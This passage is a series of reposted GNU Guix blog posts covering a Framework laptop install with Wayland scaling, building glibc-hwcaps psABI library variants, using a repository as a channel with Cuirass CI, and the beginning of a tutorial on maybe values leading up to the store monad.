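For reference, adding the nonguix channel amounts to something like the following in ~/.config/guix/channels.scm. This is a minimal sketch rather than the exact file used here: the URL is the one the nonguix project advertises, and the channel introduction that its README recommends for authentication is deliberately left out, so check the README for the current, authenticated form.

```scheme
;; ~/.config/guix/channels.scm: a sketch, not taken from the original post.
;; Assumption: the nonguix repository lives at the URL below; the README's
;; recommended 'introduction' field (for authentication) is omitted here.
(cons* (channel
        (name 'nonguix)
        (url "https://gitlab.com/nonguix/nonguix"))
       %default-channels)
```

After a guix pull, the nongnu modules become available to commands such as guix system image.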

Using that installation media, installing was a breeze.

However upon reboot, I found that I had no wifi and I was using software rendering; clearly, installation produced an OS config with the Guix kernel instead of upstream Linux. Happily, at this point the ethernet expansion card was able to work, so connect to wired ethernet, open /etc/config.scm, add the needed lines as described in the operating-system part of the nonguix README, reconfigure, and reboot. Building Linux takes a little less than an hour on this machine.
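The lines in question look roughly like this. It is a sketch based on the nonguix README, not the exact configuration from this machine, and every field not shown stays as the installer wrote it:

```scheme
;; Excerpt of /etc/config.scm (a sketch following the nonguix README).
(use-modules (gnu)
             (nongnu packages linux)        ;provides linux and linux-firmware
             (nongnu system linux-initrd))  ;provides microcode-initrd

(operating-system
  (kernel linux)                      ;vanilla Linux instead of the Guix kernel
  (initrd microcode-initrd)           ;initrd that also loads CPU microcode
  (firmware (list linux-firmware))    ;firmware needed for wifi and graphics
  ;; … the rest of the configuration is unchanged …
  )
```

Reconfiguring is then the usual sudo guix system reconfigure /etc/config.scm.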

Fractional scaling

At that point you have wifi and graphics drivers. I use GNOME, and things seem to work. However the screen defaults to 200% resolution, which makes everything really big. Crisp, pretty, but big. Really you would like something in between? Or that the Framework ships a higher-resolution screen so that 200% would be a good scaling factor; this was the case with my old Dell XPS 13, and it worked well. Anyway with the Framework laptop, I wanted 150% scaling, and it seems these days that the way you have to do this is to use Wayland, which Guix does not yet enable by default.

So you go into config.scm again, and change where it says %desktop-services to be:

(modify-services %desktop-services
  (gdm-service-type config =>
    (gdm-configuration (inherit config) (wayland? #t))))

Then when you reboot you are in Wayland. Works fine, it seems. But then you have to go and enable an experimental mutter setting; install dconf-editor, run it, search for keys with “mutter” in the name, find the “experimental settings” key, tell it to not use the default setting, then click the box for “scale-monitor-framebuffer”.

Then! You can go into GNOME settings and get 125%, 150%, and so on. Great.

HOWEVER, and I hope this is a transient situation, there is a problem: in GNOME, applications that aren’t native Wayland apps don’t scale nicely. It’s like the app gets rendered to a texture at the original resolution, which then gets scaled up in a blurry way. There aren’t so many of these apps these days as most things have been ported to be Wayland-capable, Firefox included, but Emacs is one of them :( However however! If you install the emacs-pgtk package instead of emacs, it looks better. Not perfect, but good enough. So that’s where I am.

Bugs

The laptop hangs on reboot due to this bug, but that seems a minor issue at this point. There is an ongoing tracker discussion on the community forum; like other problems in that thread, I hope that this one resolves itself upstream in Linux over time.

Other things?

I didn’t mention the funniest thing about this laptop: it comes in pieces that you have to put together :) I am not so great with hardware, but I had no problem. The build quality seems pretty good; not a MacBook Air, but then it’s also user-repairable, which is a big strong point. It has these funny extension cards that slot into the chassis, which I have found to be quite amusing.

I haven’t had the machine for long enough but it seems to work fine up to now: suspend, good battery use, not noisy (unless it’s compiling on all 16 threads), graphics, wifi, ethernet, good compilation speed. (I should give compiling LLVM a go; that’s a useful workload.) I don’t have bluetooth or the fingerprint reader working yet; I give it 25% odds that I get around to this during the lifetime of this laptop :)

Until next time, happy hacking!

#gnu #gnuorg #opensource

federatica_bot@federatica.space

GNU Guix: Building packages targeting psABIs

Starting with version 2.33, the GNU C library (glibc) grew the capability to search for shared libraries using additional paths, based on the hardware capabilities of the machine running the code. This was a great boon for x86_64, which was first released in 2003, and has seen many changes in the capabilities of the hardware since then. While it is extremely common for Linux distributions to compile for a baseline which encompasses all of an architecture, there is performance being left on the table by targeting such an old specification and not one of the newer revisions.

One option used internally in glibc and in some other performance-critical libraries is indirect functions, or IFUNCs. The loader, ld.so, uses them to pick function implementations optimized for the available CPU at load time. GCC's functional multi-versioning (FMV, see https://gcc.gnu.org/wiki/FunctionMultiVersioning) generates several optimized versions of functions, using the IFUNC mechanism so the appropriate one is selected at load time. Most performance-sensitive libraries use these strategies, but not all of them.

With the --tune package transformation option, Guix implements so-called package multi-versioning, which creates package variants using compiler flags set to use optimizations targeted for a specific CPU.

Finally - and we're getting to the central topic of this post! - glibc since version 2.33 supports another approach: ld.so searches not just the /lib folder, but also the glibc-hwcaps folders, which for x86_64 include /lib/glibc-hwcaps/x86-64-v2, /lib/glibc-hwcaps/x86-64-v3 and /lib/glibc-hwcaps/x86-64-v4, corresponding to the psABI micro-architectures of the x86_64 architecture. This means that if a library was compiled against the baseline of the architecture then it should be installed in /lib, but if it were compiled a second time, this time using (depending on the build instructions) -march=x86-64-v2, then the libraries could be installed in /lib/glibc-hwcaps/x86-64-v2 and then glibc, using ld.so, would choose the correct library at runtime.
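To make the selection concrete, here is a toy model in plain Guile of which variant is preferred when several are installed under the same lib directory. It is only an illustration under simplifying assumptions, not glibc's actual code; the procedure name preferred-variants and the variable %x86-64-levels are made up for this sketch.

```scheme
;; Toy model of the preference order described above; NOT glibc's code.
;; 'preferred-variants' and '%x86-64-levels' are hypothetical names.
(define %x86-64-levels
  ;; Most demanding micro-architecture level first.
  '("x86-64-v4" "x86-64-v3" "x86-64-v2"))

(define (preferred-variants libdir cpu-level)
  "Return the directories under LIBDIR that may hold a usable variant, best
match first, for a CPU whose highest supported level is CPU-LEVEL (or #f for
a baseline-only CPU).  The plain LIBDIR always comes last as the fallback."
  (let ((usable (or (member cpu-level %x86-64-levels) '())))
    (append (map (lambda (level)
                   (string-append libdir "/glibc-hwcaps/" level))
                 usable)
            (list libdir))))

(preferred-variants "/lib" "x86-64-v3")
;; ⇒ ("/lib/glibc-hwcaps/x86-64-v3" "/lib/glibc-hwcaps/x86-64-v2" "/lib")
```

A CPU that only supports x86-64-v3 never gets the x86-64-v4 build, and a baseline CPU falls straight through to the library in /lib.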

These micro-architectures aren't a perfect match for the different hardware available; it is often the case that a particular CPU satisfies the requirements of one tier and part of the next, and can therefore only use the optimizations provided by the first tier, not the additional features that the CPU also supports.

This of course shouldn't be a problem in Guix; it's possible, and even encouraged, to adjust packages to be more useful for one's needs. The problem comes from the search paths: ld.so will only search the glibc-hwcaps directory if it has already found the base library in the preceding /lib directory. This isn't a problem for distributions following the Filesystem Hierarchy Standard (FHS), but for Guix we need to ensure that all the different versions of the library are in the same output.

With a little bit of planning this turns out to not be as hard as it sounds. Let's take, for example, the GNU Scientific Library, gsl, a math library which helps with all sorts of numerical analysis. First we create a procedure to generate our 3 additional packages, corresponding to the psABIs that are searched for in the glibc-hwcaps directory.

(define (gsl-hwabi psabi)
  (package/inherit gsl
    (name (string-append "gsl-" psabi))
    (arguments
     (substitute-keyword-arguments (package-arguments gsl)
       ((#:make-flags flags #~'())
        #~(append (list (string-append "CFLAGS=-march=" #$psabi)
                        (string-append "CXXFLAGS=-march=" #$psabi))
                  #$flags))
       ((#:configure-flags flags #~'())
        #~(append (list (string-append "--libdir=" #$output
                                       "/lib/glibc-hwcaps/" #$psabi))
                  #$flags))
       ;; The building machine can't necessarily run the code produced.
       ((#:tests? _ #t) #f)
       ((#:phases phases #~%standard-phases)
        #~(modify-phases #$phases
            (add-after 'install 'remove-extra-files
              (lambda _
                (for-each (lambda (dir)
                            (delete-file-recursively (string-append #$output dir)))
                          (list (string-append "/lib/glibc-hwcaps/" #$psabi "/pkgconfig")
                                "/bin" "/include" "/share"))))))))
    (supported-systems '("x86_64-linux" "powerpc64le-linux"))
    (properties `((hidden? . #t)
                  (tunable? . #f)))))

We remove some directories and any binaries since we only want the libraries produced from the package; we want to use the headers and any other bits from the main package. We then combine all of the pieces together to produce a package which can take advantage of the hardware on which it is run:

(define-public gsl-hwcaps
  (package/inherit gsl
    (name "gsl-hwcaps")
    (arguments
     (substitute-keyword-arguments (package-arguments gsl)
       ((#:phases phases #~%standard-phases)
        #~(modify-phases #$phases
            (add-after 'install 'install-optimized-libraries
              (lambda* (#:key inputs outputs #:allow-other-keys)
                (let ((hwcaps "/lib/glibc-hwcaps/"))
                  (for-each
                    (lambda (psabi)
                      (copy-recursively
                        (string-append (assoc-ref inputs (string-append "gsl-" psabi))
                                       hwcaps psabi)
                        (string-append #$output hwcaps psabi)))
                    '("x86-64-v2" "x86-64-v3" "x86-64-v4")))))))))
    (native-inputs
     (modify-inputs (package-native-inputs gsl)
                    (append (gsl-hwabi "x86-64-v2")
                            (gsl-hwabi "x86-64-v3")
                            (gsl-hwabi "x86-64-v4"))))
    (supported-systems '("x86_64-linux"))
    (properties `((tunable? . #f)))))

In this case the size of the final package is increased by about 13 MiB, from 5.5 MiB to 18 MiB. It is up to you if the speed-up from providing an optimized library is worth the size trade-off.

To use this package as a replacement build input in another package, package-input-rewriting/spec is a handy tool:

(define use-glibc-hwcaps
 (package-input-rewriting/spec
   ;; Replace some packages with custom variants built with
   ;; glibc-hwcaps support.
   `(("gsl" . ,(const gsl-hwcaps)))))

(define-public inkscape-with-hwcaps
  (package
    (inherit (use-glibc-hwcaps inkscape))
    (name "inkscape-with-hwcaps")))

Of the Guix supported architectures, x86_64-linux and powerpc64le-linux can both benefit from this new capability.

Through the magic of newer versions of GCC and LLVM it is safe to use these libraries in place of the standard libraries while compiling packages; these compilers know about the glibc-hwcaps directories and will purposefully link against the base library during build time, with glibc's ld.so choosing the optimized library at runtime.

One possible use case for these libraries is creating guix packs of packages to run on other systems. By substituting these libraries it becomes possible to create a guix pack which will have better performance than a standard package used in a guix pack. This works even when the included libraries don't make use of the IFUNCs from glibc or functional multi-versioning from GCC. Providing optimized yet portable pre-compiled binaries is a great way to take advantage of this feature.

#gnu #gnuorg #opensource

federatica_bot@federatica.space

GNU Guix: From development environments to continuous integration—the ultimate guide to software development with Guix

Guix is a handy tool for developers; guix shell, in particular, gives a standalone development environment for your package, no matter what language(s) it’s written in. To benefit from it, you have to initially write a package definition and have it either in Guix proper, in a channel, or directly upstream as a guix.scm file. This last option is appealing: all developers have to do to get set up is clone the project's repository and run guix shell, with no arguments—we looked at the rationale for guix shell in an earlier article.

Development needs go beyond development environments though. How can developers perform continuous integration of their code in Guix build environments? How can they deliver their code straight to adventurous users? This post describes a set of files developers can add to their repository to set up Guix-based development environments, continuous integration, and continuous delivery—all at once.

Getting started

How do we go about “Guixifying” a repository? The first step, as we’ve seen, will be to add a guix.scm at the root of the repository in question. We’ll take Guile as an example in this post: it’s written in Scheme (mostly) and C, and has a number of dependencies—a C compilation tool chain, C libraries, Autoconf and its friends, LaTeX, and so on. The resulting guix.scm looks like the usual package definition, just without the define-public bit:

;; The ‘guix.scm’ file for Guile, for use by ‘guix shell’.

(use-modules (guix)
             (guix build-system gnu)
             ((guix licenses) #:prefix license:)
             (gnu packages autotools)
             (gnu packages base)
             (gnu packages bash)
             (gnu packages bdw-gc)
             (gnu packages compression)
             (gnu packages flex)
             (gnu packages gdb)
             (gnu packages gettext)
             (gnu packages gperf)
             (gnu packages libffi)
             (gnu packages libunistring)
             (gnu packages linux)
             (gnu packages pkg-config)
             (gnu packages readline)
             (gnu packages tex)
             (gnu packages texinfo)
             (gnu packages version-control))

(package
  (name "guile")
  (version "3.0.99-git")                          ;funky version number
  (source #f)                                     ;no source
  (build-system gnu-build-system)
  (native-inputs
   (append (list autoconf
                 automake
                 libtool
                 gnu-gettext
                 flex
                 texinfo
                 texlive-base                 ;for "make pdf"
                 texlive-epsf
                 gperf
                 git
                 gdb
                 strace
                 readline
                 lzip
                 pkg-config)

           ;; When cross-compiling, a native version of Guile itself is
           ;; needed.
           (if (%current-target-system)
               (list this-package)
               '())))
  (inputs
   (list libffi bash-minimal))
  (propagated-inputs
   (list libunistring libgc))

  (native-search-paths
   (list (search-path-specification
          (variable "GUILE_LOAD_PATH")
          (files '("share/guile/site/3.0")))
         (search-path-specification
          (variable "GUILE_LOAD_COMPILED_PATH")
          (files '("lib/guile/3.0/site-ccache")))))
  (synopsis "Scheme implementation intended especially for extensions")
  (description
   "Guile is the GNU Ubiquitous Intelligent Language for Extensions,
and it's actually a full-blown Scheme implementation!")
  (home-page "https://www.gnu.org/software/guile/")
  (license license:lgpl3+))

Quite a bit of boilerplate, but now someone who’d like to hack on Guile just needs to run:

guix shell

That gives them a shell containing all the dependencies of Guile: those listed above, but also implicit dependencies such as the GCC tool chain, GNU Make, sed, grep, and so on. The chef’s recommendation:

guix shell --container --link-profile

That gives a shell in an isolated container, and all the dependencies show up in $HOME/.guix-profile, which plays well with caches such as config.cache and absolute file names recorded in generated Makefiles and the like. The fact that the shell runs in a container brings peace of mind: nothing but the current directory and Guile’s dependencies is visible inside the container; nothing from the system can possibly interfere with your development.

Level 1: Building with Guix

Now that we have a package definition, why not also take advantage of it so we can build Guile with Guix? We had left the source field empty, because guix shell above only cares about the inputs of our package—so it can set up the development environment—not about the package itself.

To build the package with Guix, we’ll need to fill out the source field, along these lines:

(use-modules (guix)
             (guix git-download)  ;for ‘git-predicate’
             …)

(define vcs-file?
  ;; Return true if the given file is under version control.
  (or (git-predicate (current-source-directory))
      (const #t)))                                ;not in a Git checkout

(package
  (name "guile")
  (version "3.0.99-git")                          ;funky version number
  (source (local-file "." "guile-checkout"
                      #:recursive? #t
                      #:select? vcs-file?))
  …)

Here’s what we changed:

  1. We added (guix git-download) to our set of imported modules, so we can use its git-predicate procedure.
  2. We defined vcs-file? as a procedure that returns true when passed a file that is under version control. For good measure, we add a fallback case for when we’re not in a Git checkout: always return true.
  3. We set source to a local-file—a recursive copy of the current directory ("."), limited to files under version control (the #:select? bit).

From there on, our guix.scm file serves a second purpose: it lets us build the software with Guix. The whole point of building with Guix is that it’s a “clean” build—you can be sure nothing from your working tree or system interferes with the build result—and it lets you test a variety of things. First, you can do a plain native build:

guix build -f guix.scm

But you can also build for another system (possibly after setting up offloading or transparent emulation):

guix build -f guix.scm -s aarch64-linux -s riscv64-linux

… or cross-compile:

guix build -f guix.scm --target=x86_64-w64-mingw32

You can also use package transformation options to test package variants:

# What if we built with Clang instead of GCC?
guix build -f guix.scm \
  --with-c-toolchain=guile@3.0.99-git=clang-toolchain

# What about that under-tested configure flag?
guix build -f guix.scm \
  --with-configure-flag=guile@3.0.99-git=--disable-networking

Handy!

Level 2: The repository as a channel

We now have a Git repository containing (among other things) a package definition. Can’t we turn it into a channel? After all, channels are designed to ship package definitions to users, and that’s exactly what we’re doing with our guix.scm.

Turns out we can indeed turn it into a channel, but with one caveat: we must create a separate directory for the .scm file(s) of our channel so that guix pull doesn’t load unrelated .scm files when someone pulls the channel—and in Guile, there are lots of them! So we’ll start like this, keeping a top-level guix.scm symlink for the sake of guix shell:

mkdir -p .guix/modules
mv guix.scm .guix/modules/guile-package.scm
ln -s .guix/modules/guile-package.scm guix.scm

To make it usable as part of a channel, we need to turn our guix.scm file into a module: we do that by changing the use-modules form at the top to a define-module form. We also need to actually export a package variable, with define-public, while still returning the package value at the end of the file so we can still use guix shell and guix build -f guix.scm. The end result looks like this (not repeating things that haven’t changed):

(define-module (guile-package)
  #:use-module (guix)
  #:use-module (guix git-download)   ;for ‘git-predicate’
  …)

(define-public guile
  (package
    (name "guile")
    (version "3.0.99-git")                          ;funky version number
    …))

;; Return the package object defined above at the end of the module.
guile

We need one last thing: a .guix-channel file so Guix knows where to look for package modules in our repository:

;; This file lets us present this repo as a Guix channel.

(channel
  (version 0)
  (directory ".guix/modules"))  ;look for package modules under .guix/modules/

To recap, we now have these files:

.
├── .guix-channel
├── guix.scm → .guix/modules/guile-package.scm
└── .guix
    └── modules
       └── guile-package.scm

And that’s it: we have a channel! (We could do better and support channel authentication so users know they’re pulling genuine code. We’ll spare you the details here but it’s worth considering!) Users can pull from this channel by adding it to ~/.config/guix/channels.scm, along these lines:

(append (list (channel
                (name 'guile)
                (url "https://git.savannah.gnu.org/git/guile.git")
                (branch "main")))
        %default-channels)
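Should the channel support authentication, the entry would additionally carry a channel introduction. The following is only a sketch: the commit and the OpenPGP fingerprint are hypothetical placeholders, not real values for the Guile repository.

```scheme
;; Sketch of an authenticated channel entry.  The commit ID and the
;; fingerprint below are HYPOTHETICAL placeholders.
(append (list (channel
                (name 'guile)
                (url "https://git.savannah.gnu.org/git/guile.git")
                (branch "main")
                (introduction
                 (make-channel-introduction
                  ;; Placeholder: first commit that can be authenticated.
                  "0123456789abcdef0123456789abcdef01234567"
                  ;; Placeholder: fingerprint of the key that signed it.
                  (openpgp-fingerprint
                   "0123 4567 89AB CDEF 0123  4567 89AB CDEF 0123 4567")))))
        %default-channels)
```

With an introduction in place, guix pull refuses commits that are not signed by a key authorized in the repository.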

After running guix pull, we can see the new package:

$ guix describe
Generation 264  May 26 2023 16:00:35    (current)
  guile 36fd2b4
    repository URL: https://git.savannah.gnu.org/git/guile.git
    branch: main
    commit: 36fd2b4920ae926c79b936c29e739e71a6dff2bc
  guix c5bc698
    repository URL: https://git.savannah.gnu.org/git/guix.git
    commit: c5bc698e8922d78ed85989985cc2ceb034de2f23
$ guix package -A ^guile$
guile   3.0.99-git      out,debug       guile-package.scm:51:4
guile   3.0.9           out,debug       gnu/packages/guile.scm:317:2
guile   2.2.7           out,debug       gnu/packages/guile.scm:258:2
guile   2.2.4           out,debug       gnu/packages/guile.scm:304:2
guile   2.0.14          out,debug       gnu/packages/guile.scm:148:2
guile   1.8.8           out             gnu/packages/guile.scm:77:2
$ guix build guile@3.0.99-git
[…]
/gnu/store/axnzbl89yz7ld78bmx72vpqp802dwsar-guile-3.0.99-git-debug
/gnu/store/r34gsij7f0glg2fbakcmmk0zn4v62s5w-guile-3.0.99-git

That’s how, as a developer, you get your software delivered directly into the hands of users! No intermediaries, yet no loss of transparency and provenance tracking.

With that in place, it also becomes trivial for anyone to create Docker images, Deb/RPM packages, or a plain tarball with guix pack:

# How about a Docker image of our Guile snapshot?
guix pack -f docker -S /bin=bin guile@3.0.99-git

# And a relocatable RPM?
guix pack -f rpm -R -S /bin=bin guile@3.0.99-git

Bonus: Package variants

We now have an actual channel, but it contains only one package. While we’re at it, we can define package variants in our guile-package.scm file, variants that we want to be able to test as Guile developers—similar to what we did above with transformation options. We can add them like so:

;; This is the ‘.guix/modules/guile-package.scm’ file.

(define-module (guile-package)
  …)

(define-public guile
  …)

(define (package-with-configure-flags p flags)
  "Return P with FLAGS as additional 'configure' flags."
  (package/inherit p
    (arguments
     (substitute-keyword-arguments (package-arguments p)
       ((#:configure-flags original-flags #~(list))
        #~(append #$original-flags #$flags))))))

(define-public guile-without-threads
  (package
    (inherit (package-with-configure-flags guile
                                           #~(list "--without-threads")))
    (name "guile-without-threads")))

(define-public guile-without-networking
  (package
    (inherit (package-with-configure-flags guile
                                           #~(list "--disable-networking")))
    (name "guile-without-networking")))


;; Return the package object defined above at the end of the module.
guile

We can build these variants as regular packages once we’ve pulled the channel. Alternatively, from a checkout of Guile, we can run a command like this one from the top level:

guix build -L $PWD/.guix/modules guile-without-threads

Level 3: Setting up continuous integration

This channel becomes even more interesting once we set up continuous integration (CI). There are several ways to do that.

You can use one of the mainstream continuous integration tools, such as GitLab-CI. To do that, you need to make sure you run jobs in a Docker image or virtual machine that has Guix installed. If we were to do that in the case of Guile, we’d have a job that runs a shell command like this one:

guix build -L $PWD/.guix/modules guile@3.0.99-git

Doing this works great and has the advantage of being easy to achieve on your favorite CI platform.

That said, you’ll really get the most out of it by using Cuirass, a CI tool designed for and tightly integrated with Guix. Using it is more work than using a hosted CI tool because you first need to set it up, but that setup phase is greatly simplified if you use its Guix System service. Going back to our example, we give Cuirass a spec file that goes like this:

;; Cuirass spec file to build all the packages of the ‘guile’ channel.
(list (specification
        (name "guile")
        (build '(channels guile))
        (channels
         (append (list (channel
                         (name 'guile)
                         (url "https://git.savannah.gnu.org/git/guile.git")
                         (branch "main")))
                 %default-channels))))

It differs from what you’d do with other CI tools in two important ways:

  • Cuirass knows it’s tracking two channels, guile and guix. Indeed, our own guile package depends on many packages provided by the guix channel—GCC, the GNU libc, libffi, and so on. Changes to packages from the guix channel can potentially influence our guile build and this is something we’d like to see as soon as possible as Guile developers.
  • Build results are not thrown away: they can be distributed as substitutes so that users of our guile channel transparently get pre-built binaries!

From a developer’s viewpoint, the end result is this status page listing evaluations: each evaluation is a combination of commits of the guix and guile channels providing a number of jobs (one job per package defined in guile-package.scm, times the number of target architectures).

As for substitutes, they come for free! As an example, since our guile jobset is built on ci.guix.gnu.org, which runs guix publish in addition to Cuirass, one automatically gets substitutes for guile builds from ci.guix.gnu.org; no additional work is needed for that.
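For those running their own instance, the Guix System service mentioned earlier can be set up along these lines. This is a sketch modeled on the example in the Guix manual, not the configuration of ci.guix.gnu.org; the variable name %cuirass-specs is arbitrary.

```scheme
;; Fragment of a Guix System configuration running Cuirass (a sketch).
(use-modules (gnu) (guix gexp))
(use-service-modules cuirass)

(define %cuirass-specs
  ;; The same specification as in the spec file, wrapped in a gexp.
  #~(list (specification
            (name "guile")
            (build '(channels guile))
            (channels
             (append (list (channel
                             (name 'guile)
                             (url "https://git.savannah.gnu.org/git/guile.git")
                             (branch "main")))
                     %default-channels)))))

;; To be added to the 'services' field of the operating-system declaration.
(service cuirass-service-type
         (cuirass-configuration
          (specifications %cuirass-specs)))
```

Serving the build results as substitutes additionally requires running guix publish on the same machine, as ci.guix.gnu.org does.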

Bonus: Build manifest

The Cuirass spec above is convenient: it builds every package in our channel, which includes a few variants. However, this might be insufficiently expressive in some cases: one might want specific cross-compilation jobs, transformations, Docker images, RPM/Deb packages, or even system tests.

To achieve that, you can write a manifest. The one we have for Guile has entries for the package variants we defined above, as well as additional variants and cross builds:

;; This is ‘.guix/manifest.scm’.

(use-modules (guix)
             (guix profiles)
             (guile-package))   ;import our own package module

(define* (package->manifest-entry* package system
                                   #:key target)
  "Return a manifest entry for PACKAGE on SYSTEM, optionally cross-compiled to
TARGET."
  (manifest-entry
    (inherit (package->manifest-entry package))
    (name (string-append (package-name package) "." system
                         (if target
                             (string-append "." target)
                             "")))
    (item (with-parameters ((%current-system system)
                            (%current-target-system target))
            package))))

(define native-builds
  (manifest
   (append (map (lambda (system)
                  (package->manifest-entry* guile system))

                '("x86_64-linux" "i686-linux"
                  "aarch64-linux" "armhf-linux"
                  "powerpc64le-linux"))
           (map (lambda (guile)
                  (package->manifest-entry* guile "x86_64-linux"))
                (cons (package
                        (inherit (package-with-c-toolchain
                                  guile
                                  `(("clang-toolchain"
                                     ,(specification->package
                                       "clang-toolchain")))))
                        (name "guile-clang"))
                      (list guile-without-threads
                            guile-without-networking
                            guile-debug
                            guile-strict-typing))))))

(define cross-builds
  (manifest
   (map (lambda (target)
          (package->manifest-entry* guile "x86_64-linux"
                                    #:target target))
        '("i586-pc-gnu"
          "aarch64-linux-gnu"
          "riscv64-linux-gnu"
          "i686-w64-mingw32"
          "x86_64-linux-gnu"))))

(concatenate-manifests (list native-builds cross-builds))

We won’t go into the details of this manifest; suffice it to say that it provides additional flexibility. We now need to tell Cuirass to build this manifest, which is done with a spec slightly different from the previous one:

;; Cuirass spec file to build the entries of ‘.guix/manifest.scm’.
(list (specification
        (name "guile")
        (build '(manifest ".guix/manifest.scm"))
        (channels
         (append (list (channel
                         (name 'guile)
                         (url "https://git.savannah.gnu.org/git/guile.git")
                         (branch "main")))
                 %default-channels))))

We changed the (build …) part of the spec to '(manifest ".guix/manifest.scm") so that it would pick our manifest, and that’s it!

Wrapping up

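We picked Guile as the running example in this post; the result is the set of files introduced above: guix.scm (a symlink), .guix-channel, .guix/modules/guile-package.scm, and .guix/manifest.scm.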

These days, repositories are commonly peppered with dot files for various tools: .envrc, .gitlab-ci.yml, .github/workflows, Dockerfile, .buildpacks, Aptfile, requirements.txt, and whatnot. It may sound like we’re proposing a bunch of additional files, but in fact those files are expressive enough to supersede most or all of those listed above.

With a couple of files, we get support for:

  • development environments (guix shell);
  • pristine test builds, including for package variants and for cross-compilation (guix build);
  • continuous integration (with Cuirass or with some other tool);
  • continuous delivery to users (via the channel and with pre-built binaries);
  • generation of derivative build artifacts such as Docker images or Deb/RPM packages (guix pack).

At the Guix headquarters, we’re quite happy about the result. We’ve been building a unified tool set for reproducible software deployment; this is an illustration of how you as a developer can benefit from it!

Acknowledgments

Thanks to Attila Lendvai, Brian Cully, and Ricardo Wurmus for providing feedback on an earlier draft of this post.

About GNU Guix

GNU Guix is a transactional package manager and an advanced distribution of the GNU system that respects user freedom. Guix can be used on top of any system running the Hurd or the Linux kernel, or it can be used as a standalone operating system distribution for i686, x86_64, ARMv7, AArch64 and POWER9 machines.

In addition to standard package management features, Guix supports transactional upgrades and roll-backs, unprivileged package management, per-user profiles, and garbage collection. When used as a standalone GNU/Linux distribution, Guix offers a declarative, stateless approach to operating system configuration management. Guix is highly customizable and hackable through Guile programming interfaces and extensions to the Scheme language.

#gnu #gnuorg #opensource

federatica_bot@federatica.space

GNU Guix: Dissecting Guix, Part 2: The Store Monad

Hello again!

In the last post, we briefly mentioned the with-store and run-with-store macros. Today, we'll be looking at those in further detail, along with the related monad library and the %store-monad!

Typically, we use monads to chain operations together, and the %store-monad is no different; it's used to combine operations that work on the Guix store (for instance, creating derivations, building derivations, or adding data files to the store).

However, monads are a little hard to explain, and from a distance, they seem to be quite incomprehensible. So, I want you to erase them from your mind for now. We'll come back to them later. And be aware that if you can't seem to get your head around them, it's okay; you can understand most of the architecture of Guix without understanding monads.

Yes, No, Maybe So

Let's instead implement another M of functional programming, maybe values, representing a value that may or may not exist. For instance, there could be a procedure that attempts to pop a stack, returning the result if there is one, or nothing if the stack has no elements.

maybe is a very common feature of statically-typed functional languages, and you'll see it all over the place in Haskell and OCaml code. However, Guile is dynamically typed, so we usually use ad-hoc #f values as the "null value" instead of a proper "nothing" or "none".

Just for fun, though, we'll implement a proper maybe in Guile. Fire up that REPL once again, and let's import a bunch of modules that we'll need:

(use-modules (ice-9 match)
             (srfi srfi-9))

We'll implement maybe as a record with two fields, is? and value. If the value contains something, is? will be #t and value will contain the thing in question, and if it's empty, is? will be #f.

(define-record-type <maybe>
  (make-maybe is? value)
  maybe?
  (is? maybe-is?)
  (value maybe-value))

Now we'll define constructors for the two possible states:

(define (something value)
  (make-maybe #t value))

(define (nothing)
  (make-maybe #f #f)) ;the value here doesn't matter; we'll just use #f
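As a small illustration of why a dedicated "nothing" can be preferable to an ad-hoc #f, here is a sketch of the stack example mentioned earlier. The stack-top procedure is a hypothetical helper, not part of Guile or Guix, and the stack is assumed to be a plain list:

```scheme
(use-modules (srfi srfi-9))

;; Same record and constructors as in the text.
(define-record-type <maybe>
  (make-maybe is? value)
  maybe?
  (is? maybe-is?)
  (value maybe-value))

(define (something value)
  (make-maybe #t value))

(define (nothing)
  (make-maybe #f #f))

;; Hypothetical helper: return the top of STACK (a list) wrapped in a
;; maybe, or an empty maybe when STACK has no elements.
(define (stack-top stack)
  (if (null? stack)
      (nothing)
      (something (car stack))))

(stack-top '(1 2 3))   ;a maybe holding 1
(stack-top '())        ;an empty maybe
(stack-top '(#f))      ;a maybe holding #f, distinct from "empty"
```

With the #f convention, the last two calls would be indistinguishable; with maybe, maybe-is? tells them apart.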

And make some silly functions that return optional values:

(define (remove-a str)
  (if (eq? (string-ref str 0) #\a)
      (something (substring str 1))
      (nothing)))

(define (remove-b str)
  (if (eq? (string-ref str 0) #\b)
      (something (substring str 1))
      (nothing)))

(remove-a "ahh")
⇒ #<<maybe> is?: #t value: "hh">

(remove-a "ooh")
⇒ #<<maybe> is?: #f value: #f>

(remove-b "bad")
⇒ #<<maybe> is?: #t value: "ad">
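Note that these procedures call string-ref on index 0, so passing an empty string raises an out-of-range error instead of returning nothing. A possible generalization, sketched below, guards against that and builds a remover for any character. The names make-remover, remove-a* and remove-b* are made up for this example:

```scheme
(use-modules (srfi srfi-9))

(define-record-type <maybe>
  (make-maybe is? value)
  maybe?
  (is? maybe-is?)
  (value maybe-value))

(define (something value)
  (make-maybe #t value))

(define (nothing)
  (make-maybe #f #f))

;; Hypothetical helper: return a procedure that strips a leading CHAR
;; from its string argument, or returns nothing if the string is
;; empty or starts with another character.
(define (make-remover char)
  (lambda (str)
    (if (and (not (string-null? str))
             (char=? (string-ref str 0) char))
        (something (substring str 1))
        (nothing))))

(define remove-a* (make-remover #\a))
(define remove-b* (make-remover #\b))

(remove-a* "ahh")   ;a maybe holding "hh"
(remove-a* "")      ;an empty maybe, no error
```

The rest of the post keeps the simpler definitions, which are fine as long as the input is never empty.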

But what if we want to compose the results of these functions?

Keeping Your Composure

As you might have guessed, this is not fun. Cosplaying as a compiler backend typically isn't.

(let ((t1 (remove-a "abcd")))
  (if (maybe-is? t1)
      (remove-b (maybe-value t1))
      (nothing)))
⇒ #<<maybe> is?: #t value: "cd">

(let ((t1 (remove-a "bbcd")))
  (if (maybe-is? t1)
      (remove-b (maybe-value t1))
      (nothing)))
⇒ #<<maybe> is?: #f value: #f>

I can almost hear the heckling. Even worse, composing three:

(let* ((t1 (remove-a "abad"))
       (t2 (if (maybe-is? t1)
               (remove-b (maybe-value t1))
               (nothing))))
  (if (maybe-is? t2)
      (remove-a (maybe-value t2))
      (nothing)))
⇒ #<<maybe> is?: #t value: "d">

So, how do we go about making this more bearable? Well, one way could be to make remove-a and remove-b accept maybes:

(define (remove-a ?str)
  (match ?str
    (($ <maybe> #t str)
     (if (eq? (string-ref str 0) #\a)
         (something (substring str 1))
         (nothing)))
    (_ (nothing))))

(define (remove-b ?str)
  (match ?str
    (($ <maybe> #t str)
     (if (eq? (string-ref str 0) #\b)
         (something (substring str 1))
         (nothing)))
    (_ (nothing))))

Not at all pretty, but it works!

(remove-b (remove-a (something "abc")))
⇒ #<<maybe> is?: #t value: "c">

Still, our procedures now require quite a bit of boilerplate. Might there be a better way?

